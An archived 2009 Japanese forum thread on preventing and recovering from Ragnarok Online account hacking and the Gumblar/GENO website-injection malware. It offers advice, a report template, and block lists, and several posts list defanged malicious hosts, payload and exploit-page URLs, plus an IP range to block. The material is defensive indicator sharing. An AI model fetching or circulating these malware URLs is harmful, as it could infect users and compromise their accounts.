(○口○*)さん <><>09/05/13 21:46 ID:7p3K98va0<>
■ このスレは『勇気が無くて見れないサイト解説スレ』ではありません ■

アカウントハックに関する情報の集積・分析を目的とするスレです。
被害や攻撃等のアカウントハックの具体的事例及びセキュリティ全般の
話題を取り扱います。

報告用&質問用にはテンプレ (>>4)を利用してください。

・ 対策の参考情報アドレス (>>2)
・ このスレでよく出てくるアプリケーションやサイトとオンラインスキャン (>>3)
・ 報告用&質問用テンプレ (>>4)
・ 安全対策の簡易まとめ、アカウントハック対応の要点とFAQ (>>5,>>6)
・ その他関連(>>7)


■スレの性格上、誤って危険なURLがそのまま貼られてしまう可能性がある■
■URLを無闇に踏んで回らないこと。報告・相談はテンプレを利用すること■

※ ID/Pass/サーバ/キャラ名等の情報は公開しないでください
※ ネタや程度を超えた雑談・脱線はご遠慮ください

・スレ立ては>>970がしてください。反応がなければ以降10ごとに。


【過去スレ】
・アカウントハック対策・セキュリティ 総合スレ Lv.3
ttp://enif.mmobbs.com/test/read.cgi/livero/1227396646/
・アカウントハック対策・セキュリティ 総合スレ Lv.2
ttp://enif.mmobbs.com/test/read.cgi/livero/1220220582/
・アカウントハック対策・セキュリティ 総合スレ
ttp://enif.mmobbs.com/test/read.cgi/livero/1213363112/

以前のログはROセキュリティWiki(ttp://rosafe.rowiki.jp/)へ <>アカウントハック対策・セキュリティ 総合スレ Lv.4 (○口○*)さん<>sage<>09/05/13 21:48 ID:7p3K98va0<> 【対策の参考情報アドレス】
・アカウントハッキングについて > 被害にあってしまったら(RO公式)
  ttp://www.ragnarokonline.jp/playguide/hacking/hacking_04.html

・ROセキュリティWiki
  ttp://rosafe.rowiki.jp/
・ROアカウントハック報告スレのまとめサイト
  ttp://sky.geocities.jp/vs_ro_hack/
・ROアカウントハック対策スレのまとめサイトのhostsファイル追加分まとめサイト(臨時)
  ttp://sky.geocities.jp/ro_hp_add/
・安全の為に (BSWikiより アカウントハッキング対策についての情報まとめ)
  ttp://smith.rowiki.jp/?Security
・リネージュ資料室 (応用可能な情報が多数)
  ttp://lineage.paix.jp/
・Alchemist service アカウントハック体験談
  ttp://air1.fc2web.com/as/id.html
・セキュリティホール memo
  ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/
・Adobe Flash Playerの脆弱性および XREA広告サーバハッキング問題 まとめ
  ttp://www.geocities.jp/pehchunpm/mondai_XREA.htm

※ 素人の検体の確保は大変危険です。手順を理解し安全に出来る人だけがしてください ※

・アンチウィルスメーカー各社検体提出先
  ttp://rosafe.rowiki.jp/index.php?%B8%A1%C2%CE%C4%F3%BD%D0%C0%E8
・VirusTotal
  ttp://www.virustotal.com/jp/
・VirSCAN.org
  ttp://virscan.org/ <> (○口○*)さん<>sage<>09/05/13 21:49 ID:7p3K98va0<> 【このスレでよく出てくるアプリケーション】
・PeerGuardian2 (PG2と略される。下記は対策スレのまとめサイトの簡単な手引き)
  ttp://sky.geocities.jp/vs_ro_hack/pg2.htm
  ・【PeerGuardian2 暫定ダウンロード先】
   現在本家から落とせないので、キャッシュを利用してください。下から7番目。
   ttp://web.archive.org/web/20080209171747/http://www.dukedog.flnet.org/trans.html
   文字化けして読めないと思いますが、こう書いてあります。
   必要な物をダウンロードしましょう。
     >PeerGuardian 2 for Windows β6b 日本語第2版 2000・XP・2003用 / 98・ME用 / ソースコード
     >PeerGuardian Lite (β050422) 日本語版 / ソースコード
  ・本家の英語版 ttp://phoenixlabs.org/pg2/
  ファイル情報
     pg2-050918-nt-jp.exe 1.34 MB (1,412,454 バイト)
     CBC9280A
     C55F4B13B568927B58965B93987CBE17
  ・【PG2導入の手引き】
   ttp://ff11.my-sv.net/pg2/install.html
     Vistaの場合は、PeerGuardian 2 RC1 Test を、フォーラム(登録が必要)にある
     ローダー経由で実行しないと、動作を開始しませんのでご注意ください。
【URLが危険か判断できない際に使われるサイト】
・ソースチェッカーオンライン (ソースや隠れたインラインフレームの転送先を確認できる)
 ttp://so.7walker.net/guide.php
・aguse.jp (ゲートウェイからスクリーンショットした画面を見ることが出来る)
 ttp://www.aguse.jp/
 ここで安全と表示された場合でも、鵜呑みにして信用しないように。
【PCにウィルス対策ソフトを導入してない方へ ネットから出来るオンラインスキャン】
・Kaspersky Internet Security 試用版
  ttp://www.just-kaspersky.jp/products/try/
・カスペルスキー:オンライン ウイルス&スパイウェアスキャナ
  ttp://www.kaspersky.co.jp/virusscanner
  ttp://www.kaspersky.com/virusscanner <> (○口○*)さん<>sage<>09/05/13 21:49 ID:7p3K98va0<> 【投稿の際の注意】
・アカハックアドレスはMMOBBSでは禁止単語になっています。
 加えて、誤クリックによる感染を防ぐ為にそのようなアドレスは
 .(ドット)を別の文字に置き換えて報告して下さい (■がよく使われています)
・質問前後にテンプレ等を見て知識を深めると更にGoodです
・回答者はエスパーでは有りません。情報は出来るだけ多く。
 提供した情報の量と質に応じて助言の量と質は向上します
・結局は本人にしかどうにも出来ない事を忘れてはいけません

 ----------報告用テンプレ----------
● 実際にアカウントハックを受けた/怪しいアドレスを踏んだ時の報告用

【      気付いた日時          】 (被害に気付いた日時)
【不審なアドレスのクリックの有無 】 (blog/bbs/Wiki等で踏んだ記憶の有無とそのアドレス)
【他人にID/Passを教えた事の有無】 (Yes/No)
【他人が貴方のPCを使う可能性の有無】 (Yes/No)
【    ツールの使用の有無      】 (Yes/No、Yesの場合はそのToolの説明)
【  ネットカフェの利用の有無    】 (Yes/No)
【     OS    】 (Windowsのバージョン、ServicePack等まで書く)
【使用ブラウザ 】 (InternetExplorerなど、バージョン等まで分かれば書く)
【WindowsUpdateの有無】 (一番最後はいつ頃か、等)
【 アンチウイルスソフト 】 (NortonInternetSecurity2007 等)
【その他のSecurty対策 】 (Spybot S&D、ルータ、等)
【 ウイルススキャン結果】 (カスペルスキーオンラインスキャンでRODLL.DLL発見 等)
【スレログやテンプレを読んだか】 (Yes/No/今から読みます)
【hostsファイルの変更】(有/無 [有りの場合は最終更新は何時ごろか])
【PeerGuardian2の導入】(有/無 [有りの場合は参照元サイトはどこか)
【説明】 (被害状況をできるかぎり詳しく書く) <> (○口○*)さん<>sage<>09/05/13 21:52 ID:7p3K98va0<> 【安全対策の簡易まとめ】
以下は要点となります。詳しくは関連サイトを見てください。

 ・アドレスをホイホイ踏まない。よく確認する。(IP直書きの数字のアドレスなど)
 ・特に掲示板等に貼られた拡張子まで書いてあるURL(.src exe 等)は絶対にクリックしない。
 ・出所の怪しいプログラムやスクリプトを実行しない。
 ・定期的なMicrosoftUpdate及び、各種ソフト(各種Player、Reader等)のアップデートを行う。
 ・アンチウイルスソフトの導入とウイルス定義ファイルの積極的な更新を行う。
 ・パーソナルファイアウォールソフトの導入する。
   ・hostsの利用した危険ドメインのブロック
   ・PeerGuardian2を使った危険IPのブロック など
  (※hostsは定期的な更新が必要です。更新をサボりがちな人はhostsファイル更新スクリプト
    (ttp://acopri.rowiki.jp/index.php?hostsRenewScript)の導入も視野にいれましょう)
 ・通常のネット閲覧はIEの使用を止め、他のブラウザに乗り換える(Firefox、Opera等)
 ・IEを使う場合は下記を設定
  ・信頼できるSite以外ではスクリプトやActiveXを切る
   :インターネットオプションのセキュリティの部分で設定可能
  ・偽装jpg対策(IE7とIE6SP2限定。IE6SP1以前では出来ない)
   :インターネットオプション→セキュリティ→レベルのカスタマイズ
   →「拡張子ではなく、内容によってファイルを開くこと」の項目を無効にする <> (○口○*)さん<>sage<>09/05/13 21:53 ID:7p3K98va0<>
【アカウントハック対応の要点とFAQ】
以下は要点となります。詳細な物は関連サイトをご覧下さい。

● 『アカウントハックアドレスを踏んだ』もしくは『ウィルスが見つかった』場合
 1) 速やかに感染PCのネットワークケーブルを外す
 2) 『安全な環境』から諸々のパスワードをすべて変更
 3)必要最低限のデータをバックアップ
 4)ウィルス駆除 もしくは OSのクリーンインストールやPCの再セットアップを行う
 5)セキュリティソフトの導入
 6)OSのアップデート(前もってSP+メーカーを利用すると安全にアップデートを行う事が出来ます)
 7)安全な環境になったらバックアップしたデータの書き戻し

注)
 ・安全が確認されるまで感染したPCからはNetworkに接続・ROクライアント起動・公式にログインは厳禁
 ・当然パスワード入力を伴う行動や各種メッセンジャーソフトやメールクライアントの起動も避ける
 ・変更するべき物は以下のとおり
  『ガンホーID(旧GungHo-ID)パスワード』『キャラパスワード』『メールアドレス』
  『ガンホーID変更』(ID自体の変更)は一度に限り行える。
 ・アンチウイルスソフトの過信は禁物。
  自信がなければクリーンインストール、PCの再セットアップを第1選択肢とする事。
 ・対応は慎重かつ迅速に行う事。早期に対応できればアカウントハックを防げる確率が上がる。
 ・大事なデータはバックアップは取っておくこと。(常日頃からしておくと楽)


● 関連FAQ
・『安全な環境』ってどんな物?
  ウイルスの感染が無いと思われる環境です。別PCや携帯電話・据置型ゲーム機・1CD Linux等が挙げられます。
・『安全ではない環境』ってどんな物?
  インターネットカフェ等、不特定多数が使用する環境。
  また知人友人のPCもインターネットカフェ並の危険があるものと考えるべきです。
・知り合いに頼んでパスワード変更してもらうのはダメ?
  いくら信頼できる友人でもパスワードを教えるのは良く有りませんし、その友人がウィルスに感染してないとも限りません。
  知り合いに頼むのは最後の手段であり、安全な環境が構築出来次第、再度パスワードを変更しましょう。
・オンラインウイルススキャンをしたいんだけど、やっぱりネットにつないじゃ駄目?
  駄目です。
・アンチウイルスソフトでウイルスが見つからないのでもう大丈夫だよね?
  100%の保証は出来ません。ウィルスが見つからなかった場合、チェックに使ったアンチウィルスソフトでは発見出来なかっただけです。
  安全かどうか自信が無い場合はHDDをフォーマットの上、PCの再セットアップを考えるべきです。 <> (○口○*)さん<>sage<>09/05/13 21:54 ID:7p3K98va0<> 【クリーンインストール・リカバリ・PCの再セットアップの時に便利なツール】
・SP+メーカー (最新の Service Pack を適用させたインストールCDを作成するツール)
  ttp://www.ak-office.jp/
   ・SP+メーカーのFAQ書庫(有志がまとめたWiki形式のページで上記ツールのFAQ)
     ttp://wikiwiki.jp/faqwinsppm/

【短縮アドレスについて】
Q.TinyURLの短縮アドレスが怖くて開けない。クリックする前にどんなページか分からない?
 ttp://www.oshiete-kun.net/archives/2008/07/tinyurl.html
A.設定変更で直接飛ばないようにするか、チェック用のブックマークレットを使うのがオススメ
>実は、TinyURLは、ユーザー側で設定を変えておくと、短縮済みURL→実URLの間に、2ちゃんねるの「ime.nu」のような
>中継ページを挟ませることができる。その分毎回クリックの手間が増えるわけだが、怪しげなサイト・掲示板などに行く機会が
>多い人は設定を変えておくと良いだろう。また、「ブックマークレット」という仕組みを使うと、TinyURLのリンクをブラウザ操作で
>実URLに書き換えることも可能だ。Firefoxユーザーなら、同じような書き換えを自動で行うグリースモンキースクリプトも利用できるぞ。

【AntiVir等の誤検出の提出先】
analysis.avira.com/samples/
のFile typeをFalse Positiveにして下に説明を書いて提出。(@は全角)
ALWIL Software(avast!) <virus@avast.com>
Avira GmbH(AntiVir) <virus@avira.com>
 注:他はROセキュリティWikiのアンチウィルスメーカー各社検体提出先にまとめてあります。
   ttp://rosafe.rowiki.jp/index.php?%B8%A1%C2%CE%C4%F3%BD%D0%C0%E8

【ウイルスの予備知識】
・検証ラボ:ウイルスを観察してみる
 ttp://itpro.nikkeibp.co.jp/article/COLUMN/20080402/297763/ <> (○口○*)さん<>sage<>09/05/13 22:15 ID:7p3K98va0<> テンプレ追記忘れがあったので、前スレからそのままコピペ

9 まとめ臨時 ◆kJfhJwdLoM sage 08/11/23 09:08 ID:ns6xrqPQ0
>>7
注)TinyURLの補足
短縮URLのアクセスに対しクッションページを設定できるので、有効化しておくことを強く推奨。
tinyurl■com/preview.php
enable previewsを選択することで、設定内容がcookieに保存される。
使用しているブラウザごとに実行する必要があるが、有効期限は取得時刻+10年
  補足:まとめ臨時サイトのhostsリストではtinyurl■com自体をリストに加えていますので、
     利用する場合は一旦上記ドメインを編集してリストから削除して実行する必要があります。
     (ただし、tinyurl自体規制しているので意味が無いかもしれない。) <> (○口○*)さん<>sage<>09/05/13 22:17 ID:7p3K98va0<> 便利そうなものの紹介。

CDブートで利用できる無償のマルウェア検査・駆除ソフト
ttp://internet.watch.impress.co.jp/cda/news/2008/11/26/21647.html
Dr.WEB。

USBワーム対策とスキャン軽量化「ESET Smart Security V4.0」
ttp://internet.watch.impress.co.jp/cda/news/2009/05/12/23400.html
ESETにもレスキューCDができるらしい。 <> (○口○*)さん<><>09/05/14 16:45 ID:T1Yhq0AB0<> forsety●gamedb●info/wiki/?
norton ESETでアカハック反応だ

スパム・悪戯報告スレッド
http://jbbs.livedoor.jp/bbs/read.cgi/game/21029/1171604353/236 <> (○口○*)さん<>age<>09/05/15 23:29 ID:psmG02sG0<> 小林製薬までやられたようだが、gumblar■cn 頑張ってるなぁ。ちょっと被害拡大の勢いが凄いので警告age。
(小林製薬の告知にあるような、セキュリティソフトでの除去は困難です…が、まともに告知してるだけいい方だ)
ttp://www.kobayashi.co.jp/info/090512.html
ttp://www.itmedia.co.jp/enterprise/articles/0905/15/news032.html

ネトゲのアカハックだけでなく、gumblar■cn 他のリストを個人的に作ってPG2のブロック対象にすることにしたよ。
ブロックリスト作成の際は、ここ(↓)の焼却リストが参考になる。
ttp://www3.atword.jp/gnome/

↓詳細な解説↓
ttp://jvnrss.ise.chuo-u.ac.jp/csn/index.cgi?p=zlkon.lv+%A4%AB%A4%E9+gumblar.cn+%A4%D8
ttp://ilion.blog.shinobi.jp/Entry/85/ <> (○口○*)さん<>sage<>09/05/15 23:32 ID:psmG02sG0<> 個人的に作成したPG2追加ブロックリスト。流用はご自由に。
ttp://www.mmobbs.com/uploader/files/6803.zip <> (○口○*)さん<>sage<>09/05/16 02:30 ID:pzCh3Hhd0<> 少し家を空けてたら、テンプレの3になっててちょっとびっくりした。

とはいうものの別のスレでひどいものを見つけてしまったので警告も含めて上げておきます。

小林製薬までやられたようだが、gumblar■cn 頑張ってるなぁ。ちょっと被害拡大の勢いが凄いので警告age。
(小林製薬の告知にあるような、セキュリティソフトでの除去は困難です…が、まともに告知してるだけいい方だ)
ttp://www.kobayashi.co.jp/info/090512.html
ttp://www.itmedia.co.jp/enterprise/articles/0905/15/news032.html

ネトゲのアカハックだけでなく、gumblar■cn 他のリストを個人的に作ってPG2のブロック対象にすることにしたよ。
ブロックリスト作成の際は、ここ(↓)の焼却リストが参考になる。
ttp://www3.atword.jp/gnome/

↓詳細な解説↓
ttp://ilion.blog.shinobi.jp/Entry/85/

GWを入ったあたりから、アンチウィルス反応が非常に悪いものばかり
広い範囲でサイト改竄で感染させようと動いてる模様なので、
まじめに注意してください。
自己防衛を全力でしてもきついですね、これは・・・。 <> (○口○*)さん<>sage<>09/05/16 02:32 ID:pzCh3Hhd0<> あああもうしわけありません、別ゲーのスレにちょっとアカウントハックが流行りはじめて
コピペ引用しようとしました、申し訳ない。 <> (○口○*)さん<>sage<>09/05/16 07:55 ID:8sXp8T9q0<> >>14
その程度のコピペなら気にするな、ガンガンやれ。ついでにPG2の導入方法も紹介しとけ。

ttp://lineage.paix.jp/guide/security/basic-ipfilter.html
ttp://forum.gemini777.net/tutorials/pg_jp.php
ttp://www.nicovideo.jp/watch/nm2825098 <> (○口○*)さん<>sage<>09/05/16 07:58 ID:8sXp8T9q0<> いや、こっちのがいいかもな、>PG2導入の紹介
ttp://ff11.my-sv.net/pg2/install.html <> (○口○*)さん<>sage<>09/05/16 08:20 ID:8sXp8T9q0<> 前スレ末尾にあった、偽フラッシュプレイヤーですが、ファイルが異なったのは、アドレス違った模様。
comとnetの違いですが、hosts登録や、なんかのブロックリストに入れたい人の為に一応転記。
(検体はセキュリティベンダー各種に提出済みです)

フィッシングサイト警告の出るブラウザだと、ほっといても警告出ると思いますけどね。

addobeflashplayer■com/get/flashplayer/current/install_flash_player.exe
addobeflashplayer■net/get/flashplayer/current/install_flash_player.exe <> (○口○*)さん<>sage<>09/05/16 12:39 ID:rh58I3cj0<> 例の gumblar■cn だけど martuz■cn に変わってるのもあるようだ。 <> (○口○*)さん<>sage<>09/05/16 20:45 ID:8sXp8T9q0<> >>18
セキュスレ(2ch)のGENOウイルススレの流れが速すぎてついていくのが大変だよwww

あそこで、感染中って載ってたサイトの半分以上に確認依頼のメール出して、今日は疲労困憊。
ぶっちゃけやってられ(ry

もちろん、spam送信元になりそうなエロサイトには送ってませんwww <> (○口○*)さん<>sage<>09/05/16 20:51 ID:8sXp8T9q0<> martuz■cn の PG2ブロック範囲

Ventrex LLP customers:95■129■144■0-95■129■145■255 <> (○口○*)さん<>sage<>09/05/17 11:59 ID:XlP7+n5C0<> GENOウィルススレはわけわからなくなってるね。
どうやらインターネット板に移動したようだ。 <> (○口○*)さん<>sage<>09/05/18 04:16 ID:smZiqjwk0<> GENOウィルスはスレ追っかけるのが辛いわw
煽りと荒らしと初心者君と情報錯綜しすぎ。どう見ても二次被害元になってるだけだなこれ

・改良は未だ続いててオンラインスキャン&ウィルススキャンで検出は諦めたほうが良い
・感染HPのスクリプトはAvastが比較的検出してくれるものの、すり抜けるのも確認されてる
・とりあえず「今のところは」Adobe Reader、Adobe Flash Playerの脆弱性利用してるので
最新版に更新されてるか要確認
(Adobe Readerは最新にしてJava ScriptをOFFに、他のPDFリーダー利用してる人もJava ScriptはOFF推奨)
・感染経由サイトもころころ入れ替えてきてるっぽいのでPG2等で弾いてても油断するな

こんなとこかねぇ <> (○口○*)さん<>sage<>09/05/18 10:27 ID:mAa5sRCm0<> 5.6年前にはやったのがブラストワームだっけ?
なんか被害の広がる速度があれを思い出す。 <> (○口○*)さん<>sage<>09/05/18 11:03 ID:wnkBTaZp0<> >>5
  ・偽装jpg対策(IE7とIE6SP2限定。IE6SP1以前では出来ない)
   :インターネットオプション→セキュリティ→レベルのカスタマイズ
   →「拡張子ではなく、内容によってファイルを開くこと」の項目を無効にする

(IE6SP2以降限定。IE6SP1以前では出来ない) が正しいな。IE8でも設定項目あったわ。
無効にしてなかったのに今頃気がついた。 <> (○口○*)さん<>sage<>09/05/18 11:07 ID:wnkBTaZp0<> GENO関係

まとめサイト
  ttp://www29.atwiki.jp/geno/

各社の告知
 So-NET セキュリティ通信
  多数サイトが改ざん(1) PC通販「GENO」など閲覧者にウイルス感染のおそれ
   ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1857
  多数サイトが改ざん(2) 狙われた「Adobe Reader」と「Adobe Flash Player」
   ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1856
  正規サイト改ざん(3) ウイルスに感染しないための対策
   ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1867
  国内の正規サイト改ざん:攻撃サイトを変え再襲来
   ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1884
 [ITmedia]新手のWebベースマルウェアが急拡大
  ttp://www.itmedia.co.jp/enterprise/articles/0905/15/news032.html
 人気の夜遊びウェブサイトへアクセスした人の週末が台無しに
  ttp://www.aladdin.co.jp/esafe/virus/v_all/AircBlog_post_2009_05_How-a-popular-nightlife-website-ruined-its-visitor's-weekend.html


専門的な解説等
  ttp://ilion.blog.shinobi.jp/Entry/85/
  ttp://jvnrss.ise.chuo-u.ac.jp/csn/index.cgi?p=gumblar%2Ecn+%A4%AB%A4%E9+martuz%2Ecn+%A4%D8
  ttp://www3.atword.jp/gnome/

>>12のIPブロックリストには、>>20が含まれていませんので追加が必要です。

参考焼却リスト:ttp://www3.atword.jp/gnome/2000/01/13/block-list/ <> (○口○*)さん<>sage<>09/05/19 13:27 ID:/QErNVgz0<> Roにログインしようかと思ってたらIDとパス、フォームデータに記憶したあるのに何故か出てこなかった
フォームデーターは削除した覚えが無いのでちょっと不安だ <> (○口○*)さん<>sage<>09/05/19 14:03 ID:BjRVNoyA0<> ほんとだ 消えてる <> (○口○*)さん<>sage<>09/05/19 14:30 ID:yGD3/+Em0<> メンテ中はログインページのURLが違うってことでスレ違い。 <> (○口○*)さん<>sage<>09/05/19 14:30 ID:5bDez3Bf0<> んー、俺は残ってるなぁ。

WindowsUpdateで、IE7→IE8とかやったんじゃないの? <> (○口○*)さん<>sage<>09/05/19 14:34 ID:BjRVNoyA0<> それはないな
夕べまでは残ってた

あと
パッチスレにもおなじような報告があった <> (○口○*)さん<>sage<>09/05/19 14:40 ID:5bDez3Bf0<> こんだけ時間開いて、同時刻書き込みとか(苦笑)

特にセキュリティには関係なさそうだな。ところであれだ、日本で話題の(俗称)GENOウイルスが
国際的にも名称として認知されたようだ。

eSafeでは、2番目の攻撃サイトドメイン名のGumblarを通称として利用してきたが、
日本で話題になっているGENOも同じものと認定してGoogleの検索に引っ掛かるように
依頼を出した…ということらしい。

zlkon.lv→gumlar.cn→martuz.cn(5/16より)と1月半位で3箇所に変遷してきて、正式名称無かったし
通称としては名前が通っちゃってる(ドメイン名より長期間使われている通称)のでこれでよかったの
かもしれない。

Japan's GENO = Gumblar
http://blog.scansafe.com/journal/2009/5/18/japans-geno-gumblar.html

いい加減な対応と、いい加減な告知をして、なおかつ隠蔽しようとかするからこうなるんだ。
セキュリティハザードっていうのかな、問題起きたときに、隠蔽するより正直な対応をした方が、
結果として企業の信用を落とさずに済むことの反面教師な実例だね。 <> (○口○*)さん<>sage<>09/05/19 14:59 ID:5bDez3Bf0<> RO起動時のActiveXが更新された模様。ダウンロードを要求されました。

ご報告まで。 <> (○口○*)さん<>sage<>09/05/19 15:37 ID:qEKqNGeO0<> >>32
公式サイトのこれかな

http://www.ragnarokonline.jp/news/information/notice/item/12509 <> (○口○*)さん<>sage<>09/05/19 22:10 ID:0a0ApCdu0<> >>31
まーGENOの経営者は元々はSTePからの鞍替えだし、問題も5つのNOでやり過ごすつもりだったんじゃね。
所詮はその程度の企業。ショップとしても問題だらけだし、そろそろご退場願いたいところだ。 <> (○口○*)さん<>sage<>09/05/20 07:23 ID:GduqDvLd0<> >>31
それは誤読にもほどがあるだろ…。
「日本ではGENOと呼ばれているから
 ググる時はGumblerにGENOと加えるといいよ!
 日本語読めない時はGoogle翻訳使うといいよ!」
こんなもん。 <> (○口○*)さん<>sage<>09/05/20 16:01 ID:rLsxRXzS0<> GENO本体の現在の配布元であった martuz.cn が停止したようです。

やりすぎてftpからの感染スクリプトの負荷が酷くなったので休止してるのか。
急速な周知で、効果が見込めなくなったか…それはないか。
新しいドメインでいつ攻撃再開されてもおかしくはない状態です。

サイト管理者は、自分のHPにスクリプトが挿入されていないかどうか、今のうちにチェックしておきましょう。

攻撃スクリプトは下記の名前で検出されます。(他のベンダーはスクリプト[Download的なもの]はスルーが殆ど)
 ・Avast:JS:Downloader-AC [Trj]/JS:Redirector-H? [Trj]/JS:Redirector-J? [Trj]
 ・Sophos:Troj/JSRedir-R , Troj/PHPMod-A
 ・Microsoft:Trojan:JS/Gamburl.gen!A

<埋めこまれている攻撃スクリプトの特徴>
●HTMLファイルの場合
  <body>タグの直前に難読化されたコードが埋め込まれる。
●PHPの場合
  ファイルの最初に難読化されたコードが埋め込まれる。
●JSの場合
  ファイルの最後に難読化されたコードが埋め込まれる。
その他、「images」という名称のフォルダにimages.phpというファイルが生成される事も。 <> (○口○*)さん<>sage<>09/05/21 22:02 ID:ulW8Dm9c0<> basesrv3■net/bin/in■php → basesrv3■net/bin4/in■php

既知のものっぽいですが、hosts に記述が無いので一応。 <> (○口○*)さん<>sage<>09/05/22 12:08 ID:k5lZa2nn0<> 【      気付いた日時          】 05/21 朝
【不審なアドレスのクリックの有無 】 ttp://www■sakura.sitesled■com/
【     OS    】 Windows XP SP2
【使用ブラウザ 】 FireFox 2.0.0.20
【WindowsUpdateの有無】 有 SP3を当てていない以外は最新
【 アンチウイルスソフト 】 Kaspersky 7.0
【その他のSecurty対策 】 Spybot S&D 1.6.2.46
【 ウイルススキャン結果】 上記二種でスキャン、検出されず
【スレログやテンプレを読んだか】 Yes
【hostsファイルの変更】無
【PeerGuardian2の導入】無
【説明】GoogleADSで表示されていた上記アドレスを誤クリックしてしまいました。
(GoogleADSにはROのスキンと書いてあったように思います。)
症状はポップアップメッセージが出て、そのメッセージが閉じなくなったのでブラウザを
強制終了させました。これはハックでしょうか? <> (○口○*)さん<>sage<>09/05/22 13:13 ID:go2kNWgp0<> >>38
ソース見たけど、ただのブラクラに見える。 <> (○口○*)さん<>sage<>09/05/23 15:12 ID:B2ydD/Wi0<> sp3あててないとか・・・・ <> (○口○*)さん<>sage<>09/05/24 00:30 ID:Z2flb+XlO<> Firefoxも2.x系とか…… <> (○口○*)さん<>sage<>09/05/24 13:17 ID:1qwH51780<> カスペ7.0って。
2009にしろよ・・ <> (○口○*)さん<>sage<>09/05/26 16:36 ID:xwVn2lLS0<> Office 2007用SP2に欠陥,SharePointなど5製品を試用版と誤認識
ttp://itpro.nikkeibp.co.jp/article/NEWS/20090525/330600/

噴いたwww

サービスパックでこれはちょっと酷い。
ちゃんとテストしなかった担当者は左遷か首か減給か…なーむー。(-ノ-)/Ωチーン

うちは、困って無いので、いまだにOfficeは2000だったりする。
1台だけ2007入ってるけど、誤認識されるもの入ってないから助かった。 <> (○口○*)さん<>sage<>09/05/26 17:11 ID:yClRoctz0<> QuickTimeに未パッチの脆弱性が存在か
http://www.itmedia.co.jp/enterprise/articles/0905/26/news020.html

iTunesインストールするとQuickTime付いてくるからiTunesインストールしている人は注意 <> (○口○*)さん<>sage<>09/05/26 21:17 ID:xwVn2lLS0<> ROセキュリティWikiの検体提出先修正

 ・Normanの提出先アドレスの変更
 ・Malwarebytesの追加(Malware が禁止ワードなのか投稿に失敗したのでちょっと工夫を。でもフォームへのリンクがorz)
 ・NictaTech Softwareの追加 <> (○口○*)さん<>sage<>09/05/26 21:43 ID:vkVzOKXl0<> ここにはいないはずの人なので あえて名無し。

>>45 さん
えるど系Wikiは共通の規制定義使ってますが、その中で一部のドメインが
TLDレベルで規制掛かってます。(cnとかinfoとかorgとかとか)

なので Malwarebytesが引っかかったのはそれが原因。
解析の時に規制されてるドメインに見えなければいいので、そのあたりは
上手くやってください。(cnドメインのサイトが回避策例です)

ブロック対象になって真っ白になった時は、どっかの誰かの携帯に
通知が行っているので後日気が向いたときに対応されるかもしれません。 <> (○口○*)さん<>sage<>09/05/26 21:48 ID:xwVn2lLS0<> >ここにはいない筈の人

いつも利用させて頂いております。助かってます。ありがとう。
なんどか真っ白にしちゃったので、通知が複数回行ったかと。ごめんなさい。 <> (○口○*)さん<>sage<>09/05/27 10:23 ID:gCQ1mPWY0<> 参考までに
半年ほど前にハックされて昨日のメンテで復旧されたけどアイテムは分離されてた <> (○口○*)さん<>age<>09/05/27 11:18 ID:prszo91l0<> >>48
おつかれー。経過のまとめとかあればよろしく。


mixiのコメントより
p://www■uploda■tv/v/uptv0023074■rar

uptv0023074.rar(16/40)
ttp://www.virustotal.com/analisis/b22c4196cdd5854c7fd5fd666dca5f244fd0a7c0c5ce382c37eaefb3a0a509f7-1243390198
faisnqiq.exe(16/40)
ttp://www.virustotal.com/analisis/b1412ed3acf29f8f2a3b33261691f83ddbc04b0497d01d05bd82f675cc141415-1243390245

BOT出てきた報告からこっちmixiの方はおとなしかったんだけど、また始まったかな。
ちょっと警告ageしときましょうかね。 <> (○口○*)さん<>sage<>09/05/27 13:17 ID:gCQ1mPWY0<> 簡単にまとめ
10月にウィルスどこかで踏んで、ハックされる
すぐ癌と警察(生活安全課)に報告、警察にゲームや垢の情報を伝える
警察が癌からログをもらい、その後こちらから警察に出向き調書とってもらう
その後半年ほどこちらからは放置
この前警察に電話したら、犯人は中華ということはわかったとの話
それじゃあ不正アクセスがあったことは事実ということを癌に伝えてくださいと連絡
警察から癌に連絡がいって、こっちから癌に連絡したら復旧するよと連絡きて復旧 <> (○口○*)さん<>sage<>09/05/27 13:22 ID:prszo91l0<> 報告乙〜
>それじゃあ不正アクセスがあったことは事実ということを癌に伝えてくださいと連絡

これがなかったら永遠にお待ちください状態だったんだな、きっと。 <> (○口○*)さん<>sage<>09/05/28 07:13 ID:q3E9VKUC0<> Windows Server 2008 Service Pack 2 および Windows Vista Service Pack 2
ttp://technet.microsoft.com/ja-jp/windows/dd262148.aspx

プレスリリース
ttp://www.microsoft.com/japan/presspass/detail.aspx?newsid=3695 <> (○口○*)さん<>sage<>09/05/28 10:10 ID:vtyPyCOV0<> なにやら呼び出し方法が変わったとか。server■exe は5/6製造。殆どのベンダーが撃墜。

p://www■everydaygame■net/flash05849/
p://www■skywebsv■com/play/
 p://www■skywebsv■com/play/Ms06014■htm
 p://www■skywebsv■com/play/Joewm■htm
 p://www■skywebsv■com/play/Ms08011■htm
 p://www■skywebsv■com/play/Ms08053■htm
 p://www■skywebsv■com/play/MsAccess■htm
 p://www■skywebsv■com/play/Real■htm
  p://www■skywebsv■com/play/server■exe <> (○口○*)さん<>sage<>09/05/29 13:24 ID:5LvAaKuk0<> 俺、9月にハックされて、12月末に復旧されたけど、一度も警察いってないぜ…。
県警のサイバー担当にメールしたら最寄りの警察署に連絡してくれと言うから電話で報告。
詳細に報告したメールが転送されていて本人確認くらいで電話終了。
11月末くらいに不正アクセスが確認できたので癌に連絡したが、逮捕とかまではできそうにないと電話が来た。
そして12月に復旧。

そんなに時間とれる状況でもなかったので助かったけど、なんか物足りなかった。 <> (○口○*)さん<>sage<>09/05/29 15:54 ID:GT/1+vPD0<> でも復旧遅いなと思う人間は>>51のようにせっついてもいいかもしれないな <> (○口○*)さん<>sage<>09/05/31 17:35 ID:IlH54qIm0<> DirectXに脆弱性、悪意のQuickTimeファイルでコード実行の危険
http://internet.watch.impress.co.jp/cda/news/2009/05/29/23606.html

今回、悪いのはQuickTimeではなくて、DirectXの模様。

現時点では、「QuickTimeのプラグイン」を呼び出せなくすることで回避できるようだ。

マイクロソフト セキュリティ アドバイザリ: Microsoft DirectShow 脆弱性によりリモートでコードが実行されます。
